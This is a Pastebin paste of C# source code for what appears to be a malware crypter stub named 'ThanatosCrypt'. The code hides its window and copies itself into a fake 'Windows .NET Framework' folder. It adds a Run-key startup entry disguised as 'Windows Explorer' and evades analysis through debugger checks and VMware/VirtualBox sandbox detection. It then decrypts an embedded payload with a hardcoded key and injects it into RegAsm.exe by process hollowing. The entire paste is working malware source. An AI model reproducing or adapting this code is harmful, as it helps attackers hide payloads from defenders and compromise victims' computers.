Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- public static string installDir = Environment.GetEnvironmentVariable("appdata") + "\\Windows .NET Framework";
- public static string installLoc = installDir + "\\RegAsm.exe";
- public static string myreg = "Windows Explorer";
- public static void AddStartup()
- {
- try
- {
- RegistryKey sKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- if (sKey.GetValue(myreg) == null)
- {
- sKey.SetValue(myreg, installLoc);
- sKey.Close();
- }
- else
- {
- try
- {
- RegistryKey cKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- if (cKey.GetValue(myreg) == null)
- {
- cKey.SetValue(myreg, installLoc);
- }
- else { }
- }
- catch { }
- try
- {
- RegistryKey cKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- if (cKey.GetValue(myreg) == null)
- {
- cKey.SetValue(myreg, installLoc);
- }
- else { }
- }
- catch { }
- }
- }
- catch { }
- }
- public static void EnvSetup()
- {
- if (System.Reflection.Assembly.GetExecutingAssembly().Location != installLoc)
- {
- try
- {
- if (!Directory.Exists(installDir))
- {
- Directory.CreateDirectory(installDir);
- }
- File.Copy(System.Reflection.Assembly.GetExecutingAssembly().Location, installLoc);
- }
- catch { }
- }
- else { }
- AddStartup();
- }
- [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
- public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
- [DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
- internal static extern bool IsDebuggerPresent();
- public Form1()
- {
- InitializeComponent();
- SetVisibleCore(false);
- // get application GUID as defined in AssemblyInfo.cs
- string appGuid =
- ((GuidAttribute)Assembly.GetExecutingAssembly().
- GetCustomAttributes(typeof(GuidAttribute), false).
- GetValue(0)).Value.ToString();
- // unique id for global mutex - Global prefix means it is global to the machine
- string mutexId = string.Format("Global\\{{{0}}}", appGuid);
- // Need a place to store a return value in Mutex() constructor call
- bool createdNew;
- // edited by Jeremy Wiebe to add example of setting up security for multi-user usage
- // edited by 'Marc' to work also on localized systems (don't use just "Everyone")
- var allowEveryoneRule =
- new MutexAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid
- , null)
- , MutexRights.FullControl
- , AccessControlType.Allow
- );
- var securitySettings = new MutexSecurity();
- securitySettings.AddAccessRule(allowEveryoneRule);
- // edited by MasonGZhwiti to prevent race condition on security settings via VanNguyen
- using (var mutex = new Mutex(false, mutexId, out createdNew, securitySettings))
- {
- // edited by acidzombie24
- var hasHandle = false;
- try
- {
- // note, you may want to time out here instead of waiting forever
- // edited by acidzombie24
- // mutex.WaitOne(Timeout.Infinite, false);
- hasHandle = mutex.WaitOne(5000, false);
- if (hasHandle == false)
- throw new TimeoutException("Timeout waiting for exclusive access");
- }
- catch (AbandonedMutexException)
- {
- // Log the fact that the mutex was abandoned in another process,
- // it will still get acquired
- hasHandle = true;
- }
- bool isRemoteDebuggerPresent = false;
- CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isRemoteDebuggerPresent);
- List<string> EvidenceOfSandbox = new List<string>();
- List<string> sandboxStrings = new List<string> { "vmware", "virtualbox", "vbox", "qemu", "xen" };
- string[] HKLM_Keys_To_Check_Exist = {@"HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier",
- @"SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S",
- @"SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev",
- @"SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers",
- @"SOFTWARE\VMWare, Inc.\VMWare Tools",
- @"SOFTWARE\Oracle\VirtualBox Guest Additions",
- @"HARDWARE\ACPI\DSDT\VBOX_"};
- string[] HKLM_Keys_With_Values_To_Parse = {@"SYSTEM\ControlSet001\Services\Disk\Enum\0",
- @"HARDWARE\Description\System\SystemBiosInformation",
- @"HARDWARE\Description\System\VideoBiosVersion",
- @"HARDWARE\Description\System\SystemManufacturer",
- @"HARDWARE\Description\System\SystemProductName",
- @"HARDWARE\Description\System\Logical Unit Id 0"};
- foreach (string HKLM_Key in HKLM_Keys_To_Check_Exist)
- {
- RegistryKey OpenedKey = Registry.LocalMachine.OpenSubKey(HKLM_Key, false);
- if (OpenedKey != null)
- {
- EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key);
- }
- }
- foreach (string HKLM_Key in HKLM_Keys_With_Values_To_Parse)
- {
- string valueName = new DirectoryInfo(HKLM_Key).Name;
- try
- {
- string value = (string)Registry.LocalMachine.OpenSubKey(Path.GetDirectoryName(HKLM_Key), false).GetValue(valueName);
- foreach (string sandboxString in sandboxStrings)
- {
- if (!string.IsNullOrEmpty(value) && value.ToLower().Contains(sandboxString.ToLower()))
- {
- EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key + " => " + value);
- }
- }
- }
- catch { }
- }
- string[] FilePaths = {@"C:\windows\Sysnative\Drivers\Vmmouse.sys",
- @"C:\windows\Sysnative\Drivers\vm3dgl.dll", @"C:\windows\Sysnative\Drivers\vmdum.dll",
- @"C:\windows\Sysnative\Drivers\vm3dver.dll", @"C:\windows\Sysnative\Drivers\vmtray.dll",
- @"C:\windows\Sysnative\Drivers\vmci.sys", @"C:\windows\Sysnative\Drivers\vmusbmouse.sys",
- @"C:\windows\Sysnative\Drivers\vmx_svga.sys", @"C:\windows\Sysnative\Drivers\vmxnet.sys",
- @"C:\windows\Sysnative\Drivers\VMToolsHook.dll", @"C:\windows\Sysnative\Drivers\vmhgfs.dll",
- @"C:\windows\Sysnative\Drivers\vmmousever.dll", @"C:\windows\Sysnative\Drivers\vmGuestLib.dll",
- @"C:\windows\Sysnative\Drivers\VmGuestLibJava.dll", @"C:\windows\Sysnative\Drivers\vmscsi.sys",
- @"C:\windows\Sysnative\Drivers\VBoxMouse.sys", @"C:\windows\Sysnative\Drivers\VBoxGuest.sys",
- @"C:\windows\Sysnative\Drivers\VBoxSF.sys", @"C:\windows\Sysnative\Drivers\VBoxVideo.sys",
- @"C:\windows\Sysnative\vboxdisp.dll", @"C:\windows\Sysnative\vboxhook.dll",
- @"C:\windows\Sysnative\vboxmrxnp.dll", @"C:\windows\Sysnative\vboxogl.dll",
- @"C:\windows\Sysnative\vboxoglarrayspu.dll", @"C:\windows\Sysnative\vboxoglcrutil.dll",
- @"C:\windows\Sysnative\vboxoglerrorspu.dll", @"C:\windows\Sysnative\vboxoglfeedbackspu.dll",
- @"C:\windows\Sysnative\vboxoglpackspu.dll", @"C:\windows\Sysnative\vboxoglpassthroughspu.dll",
- @"C:\windows\Sysnative\vboxservice.exe", @"C:\windows\Sysnative\vboxtray.exe",
- @"C:\windows\Sysnative\VBoxControl.exe"};
- foreach (string FilePath in FilePaths)
- {
- if (File.Exists(FilePath))
- {
- EvidenceOfSandbox.Add(FilePath);
- }
- }
- string[] badMacAddresses = { @"000C29", @"001C14", @"005056", @"000569", @"080027" };
- NetworkInterface[] NICs = NetworkInterface.GetAllNetworkInterfaces();
- foreach (NetworkInterface NIC in NICs)
- {
- foreach (string badMacAddress in badMacAddresses)
- {
- if (NIC.GetPhysicalAddress().ToString().ToLower().Contains(badMacAddress.ToLower()))
- {
- EvidenceOfSandbox.Add(Regex.Replace(NIC.GetPhysicalAddress().ToString(), ".{2}", "$0:").TrimEnd(':'));
- }
- }
- }
- if (!IsDebuggerPresent() && !isRemoteDebuggerPresent && !System.Diagnostics.Debugger.IsAttached && EvidenceOfSandbox.Count == 0)
- {
- RunPE.Execute(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"), Decryptor.Decrypt(Encoding.ASCII.GetBytes("DSNVLUOHFWE"), Encoding.Default.GetBytes(ThanatosCrypt.Resource1.primary)));
- EnvSetup();
- }
- // edited by acidzombie24, added if statement
- if (hasHandle)
- mutex.ReleaseMutex();
- Environment.Exit(0);
- }
- }
Add Comment
Please, Sign In to add comment